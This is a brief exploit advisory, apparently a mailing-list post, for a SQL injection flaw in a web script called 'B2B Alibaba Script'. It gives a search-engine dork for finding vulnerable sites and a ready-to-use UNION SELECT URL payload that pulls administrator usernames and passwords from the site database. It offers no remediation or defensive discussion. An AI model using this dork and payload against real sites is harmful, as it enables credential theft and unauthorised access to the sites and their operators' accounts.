=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-= B2B Alibaba Script SQL Injection Vulnerability Author : FormatXFormaT Bug Type : Blind SQL Injection =-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-= Dork: allinurl:news_desc.php?id= =-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-= Exploit: http://server/news_desc.php?id=[sql] http://server/news_desc.php?id=4+union+all+select+1,concat(username,0x3e,password),3,4,5+from+sblnk_admin-- =-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-= Special Thanks: All Tkurd.com Memebers. =-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-= ________________________________ Windows Live: Keep your friends up to date with what you do online.